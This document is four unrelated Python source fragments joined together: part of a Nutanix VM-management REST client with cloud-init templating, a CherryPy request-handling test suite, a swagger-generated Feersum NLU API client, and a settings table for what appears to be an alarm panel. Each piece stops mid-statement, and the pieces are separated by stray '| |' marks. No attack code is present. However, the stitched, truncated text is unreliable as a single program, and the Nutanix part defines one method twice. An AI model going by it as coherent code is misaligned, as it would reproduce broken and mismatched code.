which genereates proper configuration and encodes it for use in vm
creation in unmaged networks
Args:
network_cfg (Dict): Network configuration
{
ip_address
prefix
default_gw
dns_server1
dns_server2
dns_search
}
"""
cloud_init_file=self._read_file(self._get_templ_path(template_dir,"cloud-init-net.yaml.j2"))
net_tmpl_file=self._read_file(self._get_templ_path(template_dir,"static.yaml.j2"))
t_net=Template(net_tmpl_file) #create jinja templates
rendered_net_template=t_net.render(
ip_address=net_cfg['ip_address'],
prefix=net_cfg['prefix'],
default_gw=net_cfg['default_gw'],
dns_server1=net_cfg['dns_server1'],
dns_server2=net_cfg['dns_server2'],
dns_search=net_cfg['dns_search']
)
#self._write_file("c:\\temp\\network_cfg.yaml",rendered_net_template)
rendered_net_template_b64=b64encode(rendered_net_template.encode())
t_ci=Template(cloud_init_file)
b64_str=rendered_net_template_b64.decode('ascii')
rendered_ci_template=t_ci.render(netplan_content=b64_str)
#self._write_file("c:\\temp\\user_data.yaml",rendered_ci_template)
user_data=b64encode(rendered_ci_template.encode()).decode('ascii')
logging.debug(f"UserData:{user_data}")
return user_data
def list_clusters_screen(self):
data={
"kind":"cluster",
"length":self.max_results
}
response=self.rest_call('POST','clusters/list',data)
if response.status_code == 200:
self._print_entities(response)
def list_clusters(self):
data={
"kind":"cluster",
"length":self.max_results
}
response=self.rest_call('POST','clusters/list',data)
if response.status_code == 200:
return(response)
def list_images_screen(self):
data={
"kind":"image",
"length":self.max_results
}
response=self.rest_call('POST','images/list',data)
if response.status_code == 200:
self._print_entities(response)
def list_images(self):
data={
"kind":"image",
"length":self.max_results
}
response=self.rest_call('POST','images/list',data)
if response.status_code == 200:
return(response)
def get_image_uuid(self,image_name):
data={
"kind":"image",
"length":self.max_results
}
response=self.rest_call('POST','images/list',data)
return self._get_uuid_by_name(response,image_name) if response.status_code == 200 else False
def list_subnets(self):
data={
"kind":"subnet",
"length":self.max_results
}
response=self.rest_call('POST','subnets/list',data)
if response.status_code == 200:
return(response)
def list_subnets_screen(self):
data={
"kind":"subnet",
"length":self.max_results
}
response=self.rest_call('POST','subnets/list',data)
if response.status_code == 200:
self._print_entities(response)
def get_subnet_uuid(self,subnet_name):
data={
"kind":"subnet",
"length":self.max_results
}
response=self.rest_call('POST','subnets/list',data)
return self._get_uuid_by_name(response,subnet_name) if response.status_code == 200 else False
def list_clusters(self):
data={
"kind":"cluster",
"length":self.max_results
}
response=self.rest_call('POST','clusters/list',data)
if response.status_code == 200:
self._print_entities(response)
def list_vms_screen(self):
data={
"kind":"vm",
"length":self.max_results
}
response=self.rest_call('POST','vms/list',data)
if response.status_code == 200:
self._print_entities(response)
def list_vms(self):
data={
"kind":"vm",
"length":self.max_results
}
response=self.rest_call('POST','vms/list',data)
if response.status_code == 200:
result_json = json.loads(response.content)
return(result_json)
def list_projects(self):
data={
"kind":"project",
"length":self.max_results
}
response=self.rest_call('POST','projects/list',data)
if response.status_code == 200:
return(response)
def list_projects_screen(self):
data={
"kind":"project",
"length":self.max_results
}
response=self.rest_call('POST','projects/list',data)
if response.status_code == 200:
self._print_entities(response)
def get_current_user_uuid(self):
"""
return uuid of current user in nutanix API
"""
response=self.rest_call('GET','users/me')
if response.status_code == 200 or response.status_code == 202:
result_json = json.loads(response.content)
return result_json['metadata']['uuid']
return False
def create_vm_simple(self,
vm_name,
vm_description,
cluster_uuid,
project_uuid,
owner_uuid,
source_image_uuid,
subnet_uuid,
num_threads_per_core=1,
num_vcpus_per_socket=1,
num_sockets=1,
memory_size_mib=1024,
template_dir=".",
network_cfg=None
):
"""
Creates basic VM in nutanix
VM is created from Nutanix image
Args:
vm_name ([string]): desired name of VM (hostname)
vm_description ([string]): description of VM
cluster_uuid ([string]): uuid of cluster where to deploy VM
project_uuid ([string]): uuid of project which wjill own VM
owner_uuid ([string]): uuid of VM owner(of creating user)
source_image_uuid ([string]): OS image uuid
subnet_uuid ([uuid]): uuid of vm subnet
num_threads_per_core (int, optional): Number of threads per CPU. Defaults to 1.
num_vcpus_per_socket (int, optional): Numbers of vcpu per socker. Defaults to 1.
num_sockets (int, optional): Number of CPU sockets. Defaults to 1.
memory_size_mib (int, optional): How much memory VM will get. Defaults to 1024.
template_dir(path where CloudInit templates are stored. No inside version control!)
network_cfg(Dictionary,optional)=None: network configuraton
Thre are three cases in Nutanix:
network_cfg = None
Assign ip address automatically DHCP.
Must be used by only on networks managed by nutanix.
network_cfg (String) = ip_address
Assign specified ip_address.
Sets specified IP address using Nutanix. Netmask and gatway is
inherited from network definition
Must be used by networks managed by nutanix,otherwise it will fail.
(with error Cannot assign IP address in unmanaged network)
network_cfg (Dictionary) =
{ ip_address (String)
prefix (String)
default_gw (String)
dns_server1 (String)
dns_server2 (String)
dns_search (String)
}
Sets network according to dictionary.
Must be used for networks not managed by Nutanix
Returns:
None: Response object
"""
if network_cfg is None: #if no IP address is not specified , using DHCP
user_data=self._prepare_user_data_managed(template_dir,network_cfg)
ip_endpoint_list=[{ "ip_type":"DHCP" }]
elif isinstance(network_cfg,str): #if parameter is simple string
user_data=self._prepare_user_data_managed(template_dir,network_cfg)
ip_endpoint_list=[{
"ip": network_cfg, #!!! need validation or exception?
"type": "ASSIGNED"
}]
elif isinstance(network_cfg,dict):
user_data=self._prepare_user_data_unmanaged(template_dir,network_cfg)
ip_endpoint_list=[{ "type": "ASSIGNED"}]
else: #error
return False
data = {
"spec": {
#"api_version": "3.1.0",
"name": vm_name,
"description": vm_description,
"resources": {
"num_threads_per_core": num_threads_per_core,
"memory_size_mib": memory_size_mib,
"disk_list":[{
"device_properties":{
"device_type":"DISK",
"disk_address":
{
"device_index": 0,
"adapter_type": "SCSI"
}
},
"data_source_reference": {
"kind": "image",
"uuid": source_image_uuid
}
},
{
"device_properties":{
"disk_address": {
"adapter_type": "IDE",
"device_index": 1
},
"device_type":"CDROM"
}}
], #end disk list
"num_vcpus_per_socket": num_vcpus_per_socket,
"num_sockets": num_sockets,
"nic_list":[{
"nic_type":"NORMAL_NIC",
"is_connected": True,
"ip_endpoint_list":ip_endpoint_list,
"subnet_reference":{
"kind":"subnet",
"uuid": subnet_uuid
}
}],
"guest_tools":{
"nutanix_guest_tools":{
"state":"ENABLED",
"iso_mount_state":"MOUNTED"
}
},
"guest_customization": {
"cloud_init": {
"user_data": user_data
},
"is_overridable": False
},
}, #end respources
"cluster_reference": {
"kind": "cluster",
"uuid": cluster_uuid
}
}, #end spec
"metadata": {
"kind": "vm",
"project_reference": {
"kind": "project",
"uuid": project_uuid
},
"owner_reference": {
"kind": "user",
"uuid": owner_uuid
},
#"categories": {},
"name": vm_name
}
}
logging.debug("create_vm_simple data:")
logging.debug(data)
response=self.rest_call('POST','vms',data)
if response.status_code == 200 or response.status_code == 202:
logging.debug("create_vm_simple call success")
return response
logging.debug("create_vm_simple call failed")
logging.debug(repr(response))
return False
def _get_uuid_by_name(self,response,search_name):
"""
Goes through entities returned in response
If finds entity which name mathes search_name return uuid of this entity
If many entities match search_criteria - it is error and false is returned
Args:
response:
search_name: string
Returns:
string: with uuid of named entity
"""
uuid=False
try:
result_json = json.loads(response.content)
search_result=list(filter(lambda x: x['spec']['name'] == search_name,result_json['entities']))
if len(list(search_result))==1:
uuid=search_result[0]['metadata']['uuid']
else:
uuid=False #not found or duplicates
except json.JSONDecodeError as ex:
print("Invalid json")
print(f"Content: {response.content}")
uuid=False
except BaseException as ex: #in case of ANY error , image is not found return False
print("Unknown exception")
print(f"{repr(ex)}")
uuid=False
return uuid
def _print_entities(self,response):
"""
prints basic attributes for entities from respones
using for exploration and testing
Args:
response requests.Response: response received from web server
"""
result_json = json.loads(response.content)
for entity in result_json['entities']:
print(f"spec_name: {entity['spec']['name']} ent_name: {entity['status']['name']} uuid: {entity['metadata']['uuid']}")
def get_vm(self,vm_uuid):
#"bebb4394-0073-4864-9c67-29db86e1c77d"
data={
"kind":"vm",
"length":self.max_results,
}
logging.debug("get_vm data:{repr(data)}")
request_url='vms/%s' % vm_uuid
logging.debug(f"request_url: {request_url}")
response=self.rest_call('GET',request_url,data)
result_json=None
if response.status_code == 200:
result_json = json.loads(response.content ,encoding='utf-8')
return result_json
def get_disk0(self,vm_uuid):
"""
from device list filter out device of type SCSI and device index 0
which must be system disk
Args:
vm_uuid String: UUID of VM
returns:
dictinary of disk object
as Example:
{
'uuid': 'e194e540-d3b6-4668-a19f-bf98cb0ba140',
'disk_size_bytes': 2361393152,
'storage_config': { 'storage_container_reference': {'kind': 'storage_container','uuid': '527ce9b6-a154-4f31-85b3-6fc7cfd2db44','name': 'SelfServiceContainer'}},
'device_properties': {'disk_address': {'device_index': 0,'adapter_type': 'SCSI'},'device_type': 'DISK'},
'data_source_reference': {'kind': | |
"""Basic tests for the CherryPy core: request handling."""
from cherrypy.test import test
test.prefer_parent_path()
import cherrypy
from cherrypy import _cptools, tools
from cherrypy.lib import http, static
import types
import os
localDir = os.path.dirname(__file__)
log_file = os.path.join(localDir, "test.log")
log_access_file = os.path.join(localDir, "access.log")
favicon_path = os.path.join(os.getcwd(), localDir, "../favicon.ico")
defined_http_methods = ("OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE",
"TRACE", "CONNECT", "PROPFIND")
def setup_server():
class Root:
def index(self):
return "hello"
index.exposed = True
favicon_ico = tools.staticfile.handler(filename=favicon_path)
def andnow(self):
return "the larch"
andnow.exposed = True
def global_(self):
pass
global_.exposed = True
def delglobal(self):
del self.__class__.__dict__['global_']
delglobal.exposed = True
def defct(self, newct):
newct = "text/%s" % newct
cherrypy.config.update({'tools.response_headers.on': True,
'tools.response_headers.headers':
[('Content-Type', newct)]})
defct.exposed = True
def upload(self, file):
return "Size: %s" % len(file.file.read())
upload.exposed = True
root = Root()
class TestType(type):
"""Metaclass which automatically exposes all functions in each subclass,
and adds an instance of the subclass as an attribute of root.
"""
def __init__(cls, name, bases, dct):
type.__init__(name, bases, dct)
for value in dct.itervalues():
if isinstance(value, types.FunctionType):
value.exposed = True
setattr(root, name.lower(), cls())
class Test(object):
__metaclass__ = TestType
class URL(Test):
_cp_config = {'tools.trailing_slash.on': False}
def index(self, path_info, relative=None):
return cherrypy.url(path_info, relative=bool(relative))
def leaf(self, path_info, relative=None):
return cherrypy.url(path_info, relative=bool(relative))
class Params(Test):
def index(self, thing):
return repr(thing)
def ismap(self, x, y):
return "Coordinates: %s, %s" % (x, y)
def default(self, *args, **kwargs):
return "args: %s kwargs: %s" % (args, kwargs)
class Status(Test):
def index(self):
return "normal"
def blank(self):
cherrypy.response.status = ""
# According to RFC 2616, new status codes are OK as long as they
# are between 100 and 599.
# Here is an illegal code...
def illegal(self):
cherrypy.response.status = 781
return "oops"
# ...and here is an unknown but legal code.
def unknown(self):
cherrypy.response.status = "431 My custom error"
return "funky"
# Non-numeric code
def bad(self):
cherrypy.response.status = "error"
return "bad news"
class Redirect(Test):
class Error:
_cp_config = {"tools.err_redirect.on": True,
"tools.err_redirect.url": "/errpage",
"tools.err_redirect.internal": False,
}
def index(self):
raise NameError("redirect_test")
index.exposed = True
error = Error()
def index(self):
return "child"
def by_code(self, code):
raise cherrypy.HTTPRedirect("somewhere else", code)
by_code._cp_config = {'tools.trailing_slash.extra': True}
def nomodify(self):
raise cherrypy.HTTPRedirect("", 304)
def proxy(self):
raise cherrypy.HTTPRedirect("proxy", 305)
def stringify(self):
return str(cherrypy.HTTPRedirect("/"))
def fragment(self, frag):
raise cherrypy.HTTPRedirect("/some/url#%s" % frag)
def login_redir():
if not getattr(cherrypy.request, "login", None):
raise cherrypy.InternalRedirect("/internalredirect/login")
tools.login_redir = _cptools.Tool('before_handler', login_redir)
def redir_custom():
raise cherrypy.InternalRedirect("/internalredirect/custom_err")
class InternalRedirect(Test):
def index(self):
raise cherrypy.InternalRedirect("/")
def relative(self, a, b):
raise cherrypy.InternalRedirect("cousin?t=6")
def cousin(self, t):
assert cherrypy.request.prev.closed
return cherrypy.request.prev.query_string
def petshop(self, user_id):
if user_id == "parrot":
# Trade it for a slug when redirecting
raise cherrypy.InternalRedirect('/image/getImagesByUser?user_id=slug')
elif user_id == "terrier":
# Trade it for a fish when redirecting
raise cherrypy.InternalRedirect('/image/getImagesByUser?user_id=fish')
else:
# This should pass the user_id through to getImagesByUser
raise cherrypy.InternalRedirect('/image/getImagesByUser?user_id=%s' % user_id)
# We support Python 2.3, but the @-deco syntax would look like this:
# @tools.login_redir()
def secure(self):
return "Welcome!"
secure = tools.login_redir()(secure)
# Since calling the tool returns the same function you pass in,
# you could skip binding the return value, and just write:
# tools.login_redir()(secure)
def login(self):
return "Please log in"
login._cp_config = {'hooks.before_error_response': redir_custom}
def custom_err(self):
return "Something went horribly wrong."
def early_ir(self, arg):
return "whatever"
early_ir._cp_config = {'hooks.before_request_body': redir_custom}
class Image(Test):
def getImagesByUser(self, user_id):
return "0 images for %s" % user_id
class Flatten(Test):
def as_string(self):
return "content"
def as_list(self):
return ["con", "tent"]
def as_yield(self):
yield "content"
def as_dblyield(self):
yield self.as_yield()
as_dblyield._cp_config = {'tools.flatten.on': True}
def as_refyield(self):
for chunk in self.as_yield():
yield chunk
class Error(Test):
_cp_config = {'tools.log_tracebacks.on': True,
}
def custom(self):
raise cherrypy.HTTPError(404, "No, <b>really</b>, not found!")
custom._cp_config = {'error_page.404': os.path.join(localDir, "static/index.html")}
def noexist(self):
raise cherrypy.HTTPError(404, "No, <b>really</b>, not found!")
noexist._cp_config = {'error_page.404': "nonexistent.html"}
def page_method(self):
raise ValueError()
def page_yield(self):
yield "howdy"
raise ValueError()
def page_streamed(self):
yield "word up"
raise ValueError()
yield "very oops"
page_streamed._cp_config = {"response.stream": True}
def cause_err_in_finalize(self):
# Since status must start with an int, this should error.
cherrypy.response.status = "ZOO OK"
cause_err_in_finalize._cp_config = {'request.show_tracebacks': False}
def rethrow(self):
"""Test that an error raised here will be thrown out to the server."""
raise ValueError()
rethrow._cp_config = {'request.throw_errors': True}
class Ranges(Test):
def get_ranges(self, bytes):
return repr(http.get_ranges('bytes=%s' % bytes, 8))
def slice_file(self):
path = os.path.join(os.getcwd(), os.path.dirname(__file__))
return static.serve_file(os.path.join(path, "static/index.html"))
class Expect(Test):
def expectation_failed(self):
expect = cherrypy.request.headers.elements("Expect")
if expect and expect[0].value != '100-continue':
raise cherrypy.HTTPError(400)
raise cherrypy.HTTPError(417, 'Expectation Failed')
class Headers(Test):
def default(self, headername):
"""Spit back out the value for the requested header."""
return cherrypy.request.headers[headername]
def doubledheaders(self):
# From http://www.cherrypy.org/ticket/165:
# "header field names should not be case sensitive sayes the rfc.
# if i set a headerfield in complete lowercase i end up with two
# header fields, one in lowercase, the other in mixed-case."
# Set the most common headers
hMap = cherrypy.response.headers
hMap['content-type'] = "text/html"
hMap['content-length'] = 18
hMap['server'] = 'CherryPy headertest'
hMap['location'] = ('%s://%s:%s/headers/'
% (cherrypy.request.local.ip,
cherrypy.request.local.port,
cherrypy.request.scheme))
# Set a rare header for fun
hMap['Expires'] = 'Thu, 01 Dec 2194 16:00:00 GMT'
return "double header test"
def ifmatch(self):
val = cherrypy.request.headers['If-Match']
cherrypy.response.headers['ETag'] = val
return repr(val)
class HeaderElements(Test):
def get_elements(self, headername):
e = cherrypy.request.headers.elements(headername)
return "\n".join([unicode(x) for x in e])
class Method(Test):
def index(self):
m = cherrypy.request.method
if m in defined_http_methods:
return m
if m == "LINK":
raise cherrypy.HTTPError(405)
else:
raise cherrypy.HTTPError(501)
def parameterized(self, data):
return data
def request_body(self):
# This should be a file object (temp file),
# which CP will just pipe back out if we tell it to.
return cherrypy.request.body
def reachable(self):
return "success"
class Divorce:
"""HTTP Method handlers shouldn't collide with normal method names.
For example, a GET-handler shouldn't collide with a method named 'get'.
If you build HTTP method dispatching into CherryPy, rewrite this class
to use your new dispatch mechanism and make sure that:
"GET /divorce HTTP/1.1" maps to divorce.index() and
"GET /divorce/get?ID=13 HTTP/1.1" maps to divorce.get()
"""
documents = {}
def index(self):
yield "<h1>Choose your document</h1>\n"
yield "<ul>\n"
for id, contents in self.documents.iteritems():
yield (" <li><a href='/divorce/get?ID=%s'>%s</a>: %s</li>\n"
% (id, id, contents))
yield "</ul>"
index.exposed = True
def get(self, ID):
return ("Divorce document %s: %s" %
(ID, self.documents.get(ID, "empty")))
get.exposed = True
root.divorce = Divorce()
class Cookies(Test):
def single(self, name):
cookie = cherrypy.request.cookie[name]
cherrypy.response.cookie[name] = cookie.value
def multiple(self, names):
for name in names:
cookie = cherrypy.request.cookie[name]
cherrypy.response.cookie[name] = cookie.value
class ThreadLocal(Test):
def index(self):
existing = repr(getattr(cherrypy.request, "asdf", None))
cherrypy.request.asdf = "rassfrassin"
return existing
cherrypy.config.update({
'log.error_file': log_file,
'environment': 'test_suite',
'server.max_request_body_size': 200,
'server.max_request_header_size': 500,
})
appconf = {
'/': {'log.access_file': log_access_file},
'/method': {'request.methods_with_bodies': ("POST", "PUT", "PROPFIND")},
}
cherrypy.tree.mount(root, config=appconf)
# Client-side code #
from cherrypy.test import helper
class CoreRequestHandlingTest(helper.CPWebCase):
def testParams(self):
self.getPage("/params/?thing=a")
self.assertBody("'a'")
self.getPage("/params/?thing=a&thing=b&thing=c")
self.assertBody("['a', 'b', 'c']")
# Test friendly error message when given params are not accepted.
ignore = helper.webtest.ignored_exceptions
ignore.append(TypeError)
try:
self.getPage("/params/?notathing=meeting")
self.assertInBody("index() got an unexpected keyword argument 'notathing'")
finally:
ignore.pop()
# Test "% HEX HEX"-encoded URL, param keys, and values
self.getPage("/params/%d4%20%e3/cheese?Gruy%E8re=Bulgn%e9ville")
self.assertBody(r"args: ('\xd4 \xe3', 'cheese') "
r"kwargs: {'Gruy\xe8re': 'Bulgn\xe9ville'}")
# Make sure that encoded = and & get parsed correctly
self.getPage("/params/code?url=http%3A//cherrypy.org/index%3Fa%3D1%26b%3D2")
self.assertBody(r"args: ('code',) "
r"kwargs: {'url': 'http://cherrypy.org/index?a=1&b=2'}")
# Test coordinates sent by <img ismap>
self.getPage("/params/ismap?223,114")
self.assertBody("Coordinates: 223, 114")
def testStatus(self):
self.getPage("/status/")
self.assertBody('normal')
self.assertStatus(200)
self.getPage("/status/blank")
self.assertBody('')
self.assertStatus(200)
self.getPage("/status/illegal")
self.assertStatus(500)
msg = "Illegal response status from server (781 is out of range)."
self.assertErrorPage(500, msg)
self.getPage("/status/unknown")
self.assertBody('funky')
self.assertStatus(431)
self.getPage("/status/bad")
self.assertStatus(500)
msg = "Illegal response status from server ('error' is non-numeric)."
self.assertErrorPage(500, msg)
def testLogging(self):
f = open(log_access_file, "wb")
f.write("")
f.close()
f = open(log_file, "wb")
f.write("")
f.close()
self.getPage("/flatten/as_string")
self.assertBody('content')
self.assertStatus(200)
self.getPage("/flatten/as_yield")
self.assertBody('content')
self.assertStatus(200)
data = | |
# coding: utf-8
"""
FeersumNLU API
This is the HTTP API for Feersum NLU. See https://github.com/praekelt/feersum-nlu-api-wrappers for examples of how to use the API. # noqa: E501
OpenAPI spec version: 2.0.54.dev2
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from feersum_nlu.api_client import ApiClient
class DucklingEntityExtractorsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def duckling_entity_extractor_create(self, create_details, **kwargs): # noqa: E501
"""Create a duckling entity extractor. # noqa: E501
Create a new duckling entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_create(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DucklingEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_create_with_http_info(create_details, **kwargs) # noqa: E501
return data
def duckling_entity_extractor_create_with_http_info(self, create_details, **kwargs): # noqa: E501
"""Create a duckling entity extractor. # noqa: E501
Create a new duckling entity extractor or reload one from the trash. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_create_with_http_info(create_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DucklingEntityExtractorCreateDetails create_details: The details of the instance to create. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method duckling_entity_extractor_create" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_details' is set
if ('create_details' not in params or
params['create_details'] is None):
raise ValueError("Missing the required parameter `create_details` when calling `duckling_entity_extractor_create`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'create_details' in params:
body_params = params['create_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/duckling_entity_extractors', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DucklingEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def duckling_entity_extractor_del(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and return the details of the named duckling entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_del(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_del_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def duckling_entity_extractor_del_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Delete named instance. # noqa: E501
Delete and return the details of the named duckling entity extractor instance. Deleted models can be reloaded from the trash with the create operation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_del_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method duckling_entity_extractor_del" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `duckling_entity_extractor_del`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/duckling_entity_extractors/{instance_name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DucklingEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def duckling_entity_extractor_get_details(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named duckling entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_get_details(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_get_details_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def duckling_entity_extractor_get_details_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get details of named instance. # noqa: E501
Get the details of the named duckling entity extractor instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_get_details_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: DucklingEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method duckling_entity_extractor_get_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `duckling_entity_extractor_get_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/duckling_entity_extractors/{instance_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DucklingEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def duckling_entity_extractor_get_details_all(self, **kwargs): # noqa: E501
"""Get list of regular expression entity extractors. # noqa: E501
Get the list of duckling entity extractors. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.duckling_entity_extractor_get_details_all(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_caller:
:return: list[DucklingEntityExtractorInstanceDetail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.duckling_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.duckling_entity_extractor_get_details_all_with_http_info(**kwargs) # noqa: E501
return data
def duckling_entity_extractor_get_details_all_with_http_info(self, | |
),
"x10Lockout" : SettingsCommand( True, 1, "TIME", 16, 532, 16, 0, -1, "X10 Lockout Time (start HH:MM)", {} ),
"x10Phase" : SettingsCommand( True, 1, "BYTE", 8, 748, 8, 0, -1, "X10 3 Phase and frequency", { '0':"Disable", '1':"50 Hz", '2':"60 Hz"} ),
"panelSerialCode": SettingsCommand( False, 1, "BYTE", 8,0x437, 8, 0, -1, "Panel Serial Code", {} ), # page 4 offset 55
"panelTypeCode" : SettingsCommand( False, 1, "BYTE", 8,0x436, 8, 0, -1, "Panel Code Type", {} ), # page 4 offset 54 and 55 ->> Panel type code
"panelSerial" : SettingsCommand( True, 1, "CODE", 48,0x430, 48, 0, -1, "Panel Serial", {} ), # page 4 offset 48
# ZONES
"zoneNameRaw" : SettingsCommand( False,31, "STRING", 0x80, 0x1900, 0x80, 0x10, -1, "Zone name <x>", {} ),
"panelEprom" : SettingsCommand( True, 1, "STRING", 128, 0x400, 128, 0, -1, "Panel Eprom", {} ),
